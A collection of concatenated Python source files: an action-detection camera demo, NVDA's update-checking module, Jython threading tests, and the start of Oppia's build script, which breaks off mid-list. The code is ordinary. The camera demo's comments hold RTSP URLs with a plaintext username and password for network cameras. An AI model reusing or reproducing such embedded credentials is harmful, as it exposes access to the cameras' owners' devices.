"""
labels = []
for i, bbox in enumerate(result):
labels.extend([i] * bbox.shape[0])
bboxes = np.concatenate(result, axis=0).astype(np.float32)
labels = np.array(labels, dtype=np.int64)
if return_ids:
ids = bboxes[:, 0].astype(np.int64)
bboxes = bboxes[:, 1:]
return bboxes, labels, ids
else:
return bboxes, labels
def det_inference(args):
global start_frame_ind, frame_queue_length
total_frame_id = 0
activate_frame_id = 0
is_already_act_show = True
act_fid = None
act_preds =None
border_length = act_model.window_size//2
while True:
ret, frame = camera.read()
total_frame_id += 1
if (not ret) or (total_frame_id%args.drawing_stepsize!=0) :
continue
activate_frame_id +=1
shape = (int(frame.shape[1] * args.img_scale), int(frame.shape[0] * args.img_scale))
img = cv2.resize(frame, shape)
bboxes, labels = det_model(img)
frame_queue.append([activate_frame_id,np.array(img),bboxes, labels])
show_frame_id, old_frame, bboxes, labels= frame_queue[0]
if is_already_act_show and len(result_queue)!=0:
act_fid, new_preds = result_queue.popleft()
is_already_act_show = False
visualize_bbox_act(old_frame, bboxes, labels, act_preds,
classes =['person'],show=True,wait_time=1)
if (act_fid is not None):
print(start_frame_ind, show_frame_id - act_fid, len(result_queue))
if abs(show_frame_id - act_fid) > border_length:
start_frame_ind += (show_frame_id - act_fid)//5
start_frame_ind = max(min(start_frame_ind, frame_queue_length-border_length), border_length)
#print(frame_queue_length-border_length, start_frame_ind, border_length)
if (show_frame_id >= act_fid) :
act_preds = new_preds
is_already_act_show = True
def act_inference(args):
while len(frame_queue) == 0:
time.sleep(0.2)
while True:
frame_inds = start_frame_ind + np.arange(0, act_model.window_size, act_model.frame_interval)
if (len(result_queue) <=3) and (len(frame_queue) > frame_inds[-1]):
cur_windows_fids, cur_windows_imgs, = [], []
cur_windows_dets, cur_windows_labels = [], []
for ind in frame_inds:
cur_windows_fids.append(frame_queue[ind][0])
act_img = frame_queue[ind][1].astype(np.float32)
cur_windows_imgs.append(act_img)
det = frame_queue[ind][2].astype(np.float32)
cur_windows_dets.append(det)
cur_windows_labels.append(frame_queue[ind][3])
fid = cur_windows_fids[len(cur_windows_fids) // 2]
act_pred = act_model(cur_windows_imgs, cur_windows_dets)
print(act_pred)
result_queue.append([fid, act_pred])
else:
time.sleep(0.005)
def main():
global frame_queue, frame_queue_length, result_queue
global det_model
global act_model, window_size, start_frame_ind
global camera, camera_fps, frame_w, frame_h
args = parse_args()
camera = cv2.VideoCapture(args.camera_id)
#camera = cv2.VideoCapture('rtsp://admin:XFchipeak@192.168.1.48:554')
#camera = cv2.VideoCapture('demo/ava_demo.mp4')
camera_fps = camera.get(cv2.CAP_PROP_FPS) # ๅธง็
det_model = DetModel(args.det_config, args.det_checkpoint, score_thr=0.5, device=args.device)
config = mmcv.Config.fromfile(args.config)
labels2names_dict = load_label_map(config.data)
act_model = ActModel(args.config, args.checkpoint, score_thr=0.5, label_dict=labels2names_dict, device=args.device)
start_frame_ind = act_model.window_size
frame_queue_length = act_model.window_size*3
assert act_model.window_size > 0
try:
frame_queue = deque(maxlen=frame_queue_length)
result_queue = deque(maxlen=5)
pw = Thread(target=det_inference, args=(args, ), daemon=True)
pr = Thread(target=act_inference, args=(args, ), daemon=True)
pw.start()
pr.start()
pw.join()
pr.join()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
# rtsp://admin:XFchipeak@192.168.1.64:554
# mywork/seq2.avi
|
updateCheck.py | #updateCheck.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2018 NV Access Limited, Zahari Yurukov, Babbage B.V.
"""Update checking functionality.
@note: This module may raise C{RuntimeError} on import if update checking for this build is not supported.
"""
import globalVars
import config
if globalVars.appArgs.secure:
raise RuntimeError("updates disabled in secure mode")
elif config.isAppX:
raise RuntimeError("updates managed by Windows Store")
import versionInfo
if not versionInfo.updateVersionType:
raise RuntimeError("No update version type, update checking not supported")
import winVersion
import os
import threading
import time
import cPickle
import urllib
import tempfile
import hashlib
import ctypes.wintypes
import ssl
import wx
import languageHandler
import gui
from gui import guiHelper
from logHandler import log
import config
import shellapi
import winUser
#: The URL to use for update checks.
CHECK_URL = "https://www.nvaccess.org/nvdaUpdateCheck"
#: The time to wait between checks.
CHECK_INTERVAL = 86400 # 1 day
#: The time to wait before retrying a failed check.
RETRY_INTERVAL = 600 # 10 min
#: The download block size in bytes.
DOWNLOAD_BLOCK_SIZE = 8192 # 8 kb
#: directory to store pending update files
storeUpdatesDir=os.path.join(globalVars.appArgs.configPath, 'updates')
try:
os.makedirs(storeUpdatesDir)
except OSError:
if not os.path.isdir(storeUpdatesDir):
log.debugWarning("Default download path for updates %s could not be created."%storeUpdatesDir)
#: Persistent state information.
#: @type: dict
state = None
_stateFileName = None
#: The single instance of L{AutoUpdateChecker} if automatic update checking is enabled,
#: C{None} if it is disabled.
autoChecker = None
def checkForUpdate(auto=False):
"""Check for an updated version of NVDA.
This will block, so it generally shouldn't be called from the main thread.
@param auto: Whether this is an automatic check for updates.
@type auto: bool
@return: Information about the update or C{None} if there is no update.
@rtype: dict
@raise RuntimeError: If there is an error checking for an update.
"""
params = {
"autoCheck": auto,
"version": versionInfo.version,
"versionType": versionInfo.updateVersionType,
"osVersion": winVersion.winVersionText,
"x64": os.environ.get("PROCESSOR_ARCHITEW6432") == "AMD64",
"language": languageHandler.getLanguage(),
"installed": config.isInstalledCopy(),
}
url = "%s?%s" % (CHECK_URL, urllib.urlencode(params))
try:
res = urllib.urlopen(url)
except IOError as e:
if isinstance(e.strerror, ssl.SSLError) and e.strerror.reason == "CERTIFICATE_VERIFY_FAILED":
# #4803: Windows fetches trusted root certificates on demand.
# Python doesn't trigger this fetch (PythonIssue:20916), so try it ourselves
_updateWindowsRootCertificates()
# and then retry the update check.
res = urllib.urlopen(url)
else:
raise
if res.code != 200:
raise RuntimeError("Checking for update failed with code %d" % res.code)
info = {}
for line in res:
line = line.rstrip()
try:
key, val = line.split(": ", 1)
except ValueError:
raise RuntimeError("Error in update check output")
info[key] = val
if not info:
return None
return info
def getPendingUpdate():
"""Returns the path to the pending update, if any. Returns C{None} otherwise.
@rtype: str
"""
try:
pendingUpdateFile=state["pendingUpdateFile"]
except KeyError:
state["pendingUpdateFile"] = state["pendingUpdateVersion"] = None
return None
else:
if pendingUpdateFile and os.path.isfile(pendingUpdateFile):
return pendingUpdateFile
else:
state["pendingUpdateFile"] = None
return None
def isPendingUpdate():
"""Returns whether there is a pending update.
@rtype: bool
"""
return bool(getPendingUpdate())
def executeUpdate(destPath=None):
if not destPath:
destPath=getPendingUpdate()
if not destPath:
return
state["pendingUpdateFile"]=None
state["pendingUpdateVersion"]=None
saveState()
if config.isInstalledCopy():
executeParams = u"--install -m"
else:
portablePath = os.getcwdu()
if os.access(portablePath, os.W_OK):
executeParams = u'--create-portable --portable-path "{portablePath}" --config-path "{configPath}" -m'.format(
portablePath=portablePath,
configPath=os.path.abspath(globalVars.appArgs.configPath)
)
else:
executeParams = u"--launcher"
# #4475: ensure that the new process shows its first window, by providing SW_SHOWNORMAL
shellapi.ShellExecute(None, None,
destPath.decode("mbcs"),
executeParams,
None, winUser.SW_SHOWNORMAL)
class UpdateChecker(object):
"""Check for an updated version of NVDA, presenting appropriate user interface.
The check is performed in the background.
This class is for manual update checks.
To use, call L{check} on an instance.
"""
AUTO = False
def check(self):
"""Check for an update.
"""
t = threading.Thread(target=self._bg)
t.daemon = True
self._started()
t.start()
def _bg(self):
try:
info = checkForUpdate(self.AUTO)
except:
log.debugWarning("Error checking for update", exc_info=True)
self._error()
return
self._result(info)
if info:
state["dontRemindVersion"] = info["version"]
state["lastCheck"] = time.time()
saveState()
if autoChecker:
autoChecker.setNextCheck()
def _started(self):
self._progressDialog = gui.IndeterminateProgressDialog(gui.mainFrame,
# Translators: The title of the dialog displayed while manually checking for an NVDA update.
_("Checking for Update"),
# Translators: The progress message displayed while manually checking for an NVDA update.
_("Checking for update"))
def _error(self):
wx.CallAfter(self._progressDialog.done)
self._progressDialog = None
wx.CallAfter(gui.messageBox,
# Translators: A message indicating that an error occurred while checking for an update to NVDA.
_("Error checking for update."),
# Translators: The title of an error message dialog.
_("Error"),
wx.OK | wx.ICON_ERROR)
def _result(self, info):
wx.CallAfter(self._progressDialog.done)
self._progressDialog = None
wx.CallAfter(UpdateResultDialog, gui.mainFrame, info, False)
class AutoUpdateChecker(UpdateChecker):
"""Automatically check for an updated version of NVDA.
To use, create a single instance and maintain a reference to it.
Checks will then be performed automatically.
"""
AUTO = True
def __init__(self):
self._checkTimer = wx.PyTimer(self.check)
if config.conf["update"]["startupNotification"] and isPendingUpdate():
secsTillNext = 0 # Display the update message instantly
else:
# Set the initial check based on the last check time.
# #3260: If the system time is earlier than the last check,
# treat the last check as being right now (so the next will be tomorrow).
secsSinceLast = max(time.time() - state["lastCheck"], 0)
# The maximum time till the next check is CHECK_INTERVAL.
secsTillNext = CHECK_INTERVAL - int(min(secsSinceLast, CHECK_INTERVAL))
self._checkTimer.Start(secsTillNext * 1000, True)
def terminate(self):
self._checkTimer.Stop()
self._checkTimer = None
def setNextCheck(self, isRetry=False):
# #6127: Timers must be manipulated from the main thread.
wx.CallAfter(self._checkTimer.Stop)
wx.CallAfter(self._checkTimer.Start, (RETRY_INTERVAL if isRetry else CHECK_INTERVAL) * 1000, True)
def _started(self):
log.info("Performing automatic update check")
def _error(self):
self.setNextCheck(isRetry=True)
def _result(self, info):
if not info:
return
if info["version"]==state["dontRemindVersion"]:
return
wx.CallAfter(UpdateResultDialog, gui.mainFrame, info, True)
class UpdateResultDialog(wx.Dialog):
def __init__(self, parent, updateInfo, auto):
# Translators: The title of the dialog informing the user about an NVDA update.
super(UpdateResultDialog, self).__init__(parent, title=_("NVDA Update"))
self.updateInfo = updateInfo
mainSizer = wx.BoxSizer(wx.VERTICAL)
sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL)
if updateInfo:
self.isInstalled = config.isInstalledCopy()
if isPendingUpdate() and state["pendingUpdateVersion"] == updateInfo["version"]:
# Translators: A message indicating that an updated version of NVDA has been downloaded
# and is pending to be installed.
message = _("NVDA version {version} has been downloaded and is pending installation.").format(**updateInfo)
else:
# Translators: A message indicating that an updated version of NVDA is available.
# {version} will be replaced with the version; e.g. 2011.3.
message = _("NVDA version {version} is available.").format(**updateInfo)
else:
# Translators: A message indicating that no update to NVDA is available.
message = _("No update available.")
sHelper.addItem(wx.StaticText(self, label=message))
bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL))
if updateInfo:
if isPendingUpdate() and state["pendingUpdateVersion"] == updateInfo["version"]:
# Translators: The label of a button to install a pending NVDA update.
# {version} will be replaced with the version; e.g. 2011.3.
installPendingButton = bHelper.addButton(self, label=_("&Install NVDA {version}").format(**updateInfo))
installPendingButton.Bind(wx.EVT_BUTTON, self.onInstallButton)
# Translators: The label of a button to re-download a pending NVDA update.
label = _("Re-&download update")
else:
# Translators: The label of a button to download an NVDA update.
label = _("&Download update")
downloadButton = bHelper.addButton(self, label=label)
downloadButton.Bind(wx.EVT_BUTTON, self.onDownloadButton)
if auto and (not isPendingUpdate() or state["pendingUpdateVersion"] != updateInfo["version"]):
# Translators: The label of a button to remind the user later about performing some action.
remindMeButton = bHelper.addButton(self, label=_("Remind me &later"))
remindMeButton.Bind(wx.EVT_BUTTON, self.onLaterButton)
remindMeButton.SetFocus()
# Translators: The label of a button to close a dialog.
closeButton = bHelper.addButton(self, wx.ID_CLOSE, label=_("&Close"))
closeButton.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
self.Bind(wx.EVT_CLOSE, lambda evt: self.Destroy())
self.EscapeId = wx.ID_CLOSE
mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
self.Show()
def onInstallButton(self, evt):
executeUpdate()
self.Destroy()
def onDownloadButton(self, evt):
self.Hide()
DonateRequestDialog(gui.mainFrame, self._download)
def _download(self):
UpdateDownloader(self.updateInfo).start()
self.Destroy()
def onLaterButton(self, evt):
state["dontRemindVersion"] = None
saveState()
self.Close()
class UpdateAskInstallDialog(wx.Dialog):
def __init__(self, parent, destPath, version):
self.destPath=destPath
self.version = version
storeUpdatesDirWritable=os.path.isdir(storeUpdatesDir) and os.access(storeUpdatesDir, os.W_OK)
# Translators: The title of the dialog asking the user to Install an NVDA update.
super(UpdateAskInstallDialog, self).__init__(parent, title=_("NVDA Update"))
mainSizer = wx.BoxSizer(wx.VERTICAL)
sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL)
# Translators: A message indicating that an updated version of NVDA is ready to be installed.
sHelper.addItem(wx.StaticText(self, label=_("NVDA version {version} is ready to be installed.\n").format(version=version)))
bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL))
# Translators: The label of a button to install an NVDA update.
installButton = bHelper.addButton(self, wx.ID_OK, label=_("&Install update"))
installButton.Bind(wx.EVT_BUTTON, self.onInstallButton)
installButton.SetFocus()
if storeUpdatesDirWritable:
# Translators: The label of a button to postpone an NVDA update.
postponeButton = bHelper.addButton(self, wx.ID_CLOSE, label=_("&Postpone update"))
postponeButton.Bind(wx.EVT_BUTTON, self.onPostponeButton)
self.EscapeId = wx.ID_CLOSE
else:
self.EscapeId = wx.ID_OK
mainSizer.Add(sHelper.sizer, border=guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
def onInstallButton(self, evt):
executeUpdate(self.destPath)
self.EndModal(wx.ID_OK)
def onPostponeButton(self, evt):
finalDest=os.path.join(storeUpdatesDir, os.path.basename(self.destPath))
try:
os.renames(self.destPath, finalDest)
except:
gui.messageBox(
# Translators: The message when a downloaded update file could not be preserved.
_("Unable to postpone update."),
# Translators: The title of the message when a downloaded update file could not be preserved.
_("Error"),
wx.OK | wx.ICON_ERROR)
finalDest=self.destPath
state["pendingUpdateFile"]=finalDest
state["pendingUpdateVersion"]=self.version
# Postponing an update indicates that the user is likely interested in getting a reminder.
# Therefore, clear the dontRemindVersion.
state["dontRemindVersion"] = None
saveState()
self.EndModal(wx.ID_CLOSE)
class UpdateDownloader(object):
"""Download and start installation of an updated version of NVDA, presenting appropriate user interface.
To use, call L{start} on an instance.
"""
def __init__(self, updateInfo):
"""Constructor.
@param updateInfo: update information such as possible URLs, version and the SHA-1 hash of the file as a hex string.
@type updateInfo: dict
"""
self.updateInfo = updateInfo
self.urls = updateInfo["launcherUrl"].split(" ")
self.version = updateInfo["version"]
self.fileHash = updateInfo.get("launcherHash")
self.destPath = tempfile.mktemp(prefix="nvda_update_", suffix=".exe")
def start(self):
"""Start the download.
"""
self._shouldCancel = False
# Use a timer because timers aren't re-entrant.
self._guiExecTimer = wx.PyTimer(self._guiExecNotify)
gui.mainFrame.prePopup()
# Translators: The title of the dialog displayed while downloading an NVDA update.
self._progressDialog = wx.ProgressDialog(_("Downloading Update"),
# Translators: The progress message indicating that a connection is being established.
_("Connecting"),
# PD_AUTO_HIDE is required because ProgressDialog.Update blocks at 100%
# and waits for the user to press the Close button.
style=wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME | wx.PD_REMAINING_TIME | wx.PD_AUTO_HIDE,
parent=gui.mainFrame)
self._progressDialog.Raise()
t = threading.Thread(target=self._bg)
t.daemon = True
t.start()
def _guiExec(self, func, *args):
self._guiExecFunc = func
self._guiExecArgs = args
if not self._guiExecTimer.IsRunning():
# #6127: Timers must be manipulated from the main thread.
wx.CallAfter(self._guiExecTimer.Start, 50, True)
def _guiExecNotify(self):
self._guiExecFunc(*self._guiExecArgs)
def _bg(self):
success=False
for url in self.urls:
try:
self._download(url)
except:
log.debugWarning("Error downloading %s" % url, exc_info=True)
else: #Successfully downloaded or canceled
if not self._shouldCancel:
success=True
break
else:
# None of the URLs succeeded.
self._guiExec(self._error)
return
if not success:
try:
os.remove(self.destPath)
except OSError:
pass
return
self._guiExec(self._downloadSuccess)
def _download(self, url):
remote = urllib.urlopen(url)
if remote.code != 200:
raise RuntimeError("Download failed with code %d" % remote.code)
# #2352: Some security scanners such as Eset NOD32 HTTP Scanner
# cause huge read delays while downloading.
# Therefore, set a higher timeout.
remote.fp._sock.settimeout(120)
size = int(remote.headers["content-length"])
local = file(self.destPath, "wb")
if self.fileHash:
hasher = hashlib.sha1()
self._guiExec(self._downloadReport, 0, size)
read = 0
chunk=DOWNLOAD_BLOCK_SIZE
while True:
if self._shouldCancel:
return
if size -read <chunk:
chunk =size -read
block = remote.read(chunk)
if not block:
break
read += len(block)
if self._shouldCancel:
return
local.write(block)
if self.fileHash:
hasher.update(block)
self._guiExec(self._downloadReport, read, size)
if read < size:
raise RuntimeError("Content too short")
if self.fileHash and hasher.hexdigest() != self.fileHash:
raise RuntimeError("Content has incorrect file hash")
self._guiExec(self._downloadReport, read, size)
def _downloadReport(self, read, size):
if self._shouldCancel:
return
percent = int(float(read) / size * 100)
# Translators: The progress message indicating that a download is in progress.
cont, skip = self._progressDialog.Update(percent, _("Downloading"))
if not cont:
self._shouldCancel = True
self._stopped()
def _stopped(self):
self._guiExecTimer = None
self._guiExecFunc = None
self._guiExecArgs = None
self._progressDialog.Hide()
self._progressDialog.Destroy()
self._progressDialog = None
# Not sure why, but this doesn't work if we call it directly here.
wx.CallLater(50, gui.mainFrame.postPopup)
def _error(self):
self._stopped()
gui.messageBox(
# Translators: A message indicating that an error occurred while downloading an update to NVDA.
_("Error downloading update."),
_("Error"),
wx.OK | wx.ICON_ERROR)
def _downloadSuccess(self):
self._stopped()
gui.runScriptModalDialog(UpdateAskInstallDialog(gui.mainFrame, self.destPath, self.version))
class DonateRequestDialog(wx.Dialog):
# Translators: The message requesting donations from users.
MESSAGE = _(
"We need your help in order to continue to improve NVDA.\n"
"This project relies primarily on donations and grants. By donating, you are helping to fund full time development.\n"
"If even $10 is donated for every download, we will be able to cover all of the ongoing costs of the project.\n"
"All donations are received by NV Access, the non-profit organisation which develops NVDA.\n"
"Thank you for your support."
)
def __init__(self, parent, continueFunc):
# Translators: The title of the dialog requesting donations from users.
super(DonateRequestDialog, self).__init__(parent, title=_("Please Donate"))
self._continue = continueFunc
mainSizer=wx.BoxSizer(wx.VERTICAL)
item = wx.StaticText(self, label=self.MESSAGE)
mainSizer.Add(item, border=20, flag=wx.LEFT | wx.RIGHT | wx.TOP)
sizer = wx.BoxSizer(wx.HORIZONTAL)
# Translators: The label of the button to donate
# in the "Please Donate" dialog.
item = self.donateButton = wx.Button(self, label=_("&Donate"))
item.Bind(wx.EVT_BUTTON, self.onDonate)
sizer.Add(item)
# Translators: The label of the button to decline donation
# in the "Please Donate" dialog.
item = wx.Button(self, wx.ID_CLOSE, label=_("&Not now"))
item.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
sizer.Add(item)
self.Bind(wx.EVT_CLOSE, self.onClose)
self.EscapeId = wx.ID_CLOSE
mainSizer.Add(sizer, flag=wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, border=20)
self.Sizer = mainSizer
mainSizer.Fit(self)
self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)
self.Show()
def onDonate(self, evt):
os.startfile(gui.DONATE_URL)
# Translators: The label of a button to indicate that the user is finished donating
# in the "Please Donate" dialog.
self.donateButton.Label = _("&Done")
self.donateButton.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
def onClose(self, evt):
self.Hide()
self._continue()
self.Destroy()
def saveState():
try:
cPickle.dump(state, file(_stateFilename, "wb"))
except:
log.debugWarning("Error saving state", exc_info=True)
def initialize():
global state, _stateFilename, autoChecker
_stateFilename = os.path.join(globalVars.appArgs.configPath, "updateCheckState.pickle")
try:
state = cPickle.load(file(_stateFilename, "r"))
except:
log.debugWarning("Couldn't retrieve update state", exc_info=True)
# Defaults.
state = {
"lastCheck": 0,
"dontRemindVersion": None,
"pendingUpdateVersion": None,
"pendingUpdateFile": None,
}
# check the pending version against the current version
# and make sure that pendingUpdateFile and pendingUpdateVersion are part of the state dictionary.
if "pendingUpdateVersion" not in state or state["pendingUpdateVersion"] == versionInfo.version:
state["pendingUpdateFile"] = state["pendingUpdateVersion"] = None
# remove all update files except the one that is currently pending (if any)
try:
for fileName in os.listdir(storeUpdatesDir):
f=os.path.join(storeUpdatesDir, fileName)
if f != state["pendingUpdateFile"]:
os.remove(f)
log.debug("Update file %s removed"%f)
except OSError:
log.warning("Unable to remove old update file %s"%f, exc_info=True)
if not globalVars.appArgs.launcher and (config.conf["update"]["autoCheck"] or (config.conf["update"]["startupNotification"] and isPendingUpdate())):
autoChecker = AutoUpdateChecker()
def terminate():
global state, autoChecker
state = None
if autoChecker:
autoChecker.terminate()
autoChecker = None
# These structs are only complete enough to achieve what we need.
class CERT_USAGE_MATCH(ctypes.Structure):
_fields_ = (
("dwType", ctypes.wintypes.DWORD),
# CERT_ENHKEY_USAGE struct
("cUsageIdentifier", ctypes.wintypes.DWORD),
("rgpszUsageIdentifier", ctypes.c_void_p), # LPSTR *
)
class CERT_CHAIN_PARA(ctypes.Structure):
_fields_ = (
("cbSize", ctypes.wintypes.DWORD),
("RequestedUsage", CERT_USAGE_MATCH),
("RequestedIssuancePolicy", CERT_USAGE_MATCH),
("dwUrlRetrievalTimeout", ctypes.wintypes.DWORD),
("fCheckRevocationFreshnessTime", ctypes.wintypes.BOOL),
("dwRevocationFreshnessTime", ctypes.wintypes.DWORD),
("pftCacheResync", ctypes.c_void_p), # LPFILETIME
("pStrongSignPara", ctypes.c_void_p), # PCCERT_STRONG_SIGN_PARA
("dwStrongSignFlags", ctypes.wintypes.DWORD),
)
def _updateWindowsRootCertificates():
crypt = ctypes.windll.crypt32
# Get the server certificate.
sslCont = ssl._create_unverified_context()
u = urllib.urlopen("https://www.nvaccess.org/nvdaUpdateCheck", context=sslCont)
cert = u.fp._sock.getpeercert(True)
u.close()
# Convert to a form usable by Windows.
certCont = crypt.CertCreateCertificateContext(
0x00000001, # X509_ASN_ENCODING
cert,
len(cert))
# Ask Windows to build a certificate chain, thus triggering a root certificate update.
chainCont = ctypes.c_void_p()
crypt.CertGetCertificateChain(None, certCont, None, None,
ctypes.byref(CERT_CHAIN_PARA(cbSize=ctypes.sizeof(CERT_CHAIN_PARA),
RequestedUsage=CERT_USAGE_MATCH())),
0, None,
ctypes.byref(chainCont))
crypt.CertFreeCertificateChain(chainCont)
crypt.CertFreeCertificateContext(certCont)
|
test_threading_jy.py | """Misc threading module tests
Made for Jython.
"""
from __future__ import with_statement
import random
import subprocess
import sys
import threading
import time
import unittest
from subprocess import PIPE, Popen
from test import test_support
from threading import Condition, Lock, Thread
from java.lang import Thread as JThread, InterruptedException
class ThreadingTestCase(unittest.TestCase):
def test_str_name(self):
t = Thread(name=1)
self.assertEqual(t.getName(), '1')
t.setName(2)
self.assertEqual(t.getName(), '2')
# make sure activeCount() gets decremented (see issue 1348)
def test_activeCount(self):
activeBefore = threading.activeCount()
activeCount = 10
for i in range(activeCount):
t = Thread(target=self._sleep, args=(i,))
t.setDaemon(0)
t.start()
polls = activeCount
while activeCount > activeBefore and polls > 0:
time.sleep(1)
activeCount = threading.activeCount()
polls -= 1
self.assertTrue(activeCount <= activeBefore, 'activeCount should to be <= %s, instead of %s' % (activeBefore, activeCount))
def _sleep(self, n):
time.sleep(random.random())
def test_issue1988(self):
cond = threading.Condition(threading.Lock())
locked = False
try:
locked = cond.acquire(False)
finally:
if locked:
cond.release()
class TwistedTestCase(unittest.TestCase):
def test_needs_underscored_versions(self):
self.assertEqual(threading.Lock, threading._Lock)
self.assertEqual(threading.RLock, threading._RLock)
class JavaIntegrationTestCase(unittest.TestCase):
"""Verifies that Thread.__tojava__ correctly gets the underlying Java thread"""
def test_interruptible(self):
def wait_until_interrupted(cv):
name = threading.currentThread().getName()
with cv:
while not JThread.currentThread().isInterrupted():
try:
cv.wait()
except InterruptedException, e:
break
num_threads = 5
unfair_condition = Condition()
threads = [
Thread(
name="thread #%d" % i,
target=wait_until_interrupted,
args=(unfair_condition,))
for i in xrange(num_threads)]
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
JThread.interrupt(thread)
joined_threads = 0
for thread in threads:
thread.join(1.) # timeout just in case so we don't stall regrtest
joined_threads += 1
self.assertEqual(joined_threads, num_threads)
class MemoryLeakTestCase(unittest.TestCase):
def test_socket_server(self):
# run socketserver with a small amount of memory; verify it exits cleanly
rc = subprocess.call([sys.executable,
"-J-Xmx32m",
test_support.findfile("socketserver_test.py")])
# stdout=PIPE)
self.assertEquals(rc, 0)
def test_main():
test_support.run_unittest(
JavaIntegrationTestCase,
MemoryLeakTestCase,
ThreadingTestCase,
TwistedTestCase)
if __name__ == "__main__":
test_main()
|
build.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are corresponded hash value. The paths need to be in posix style,
# as it is interpreted by the `url-interpolation` service, which which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here to since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*'
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
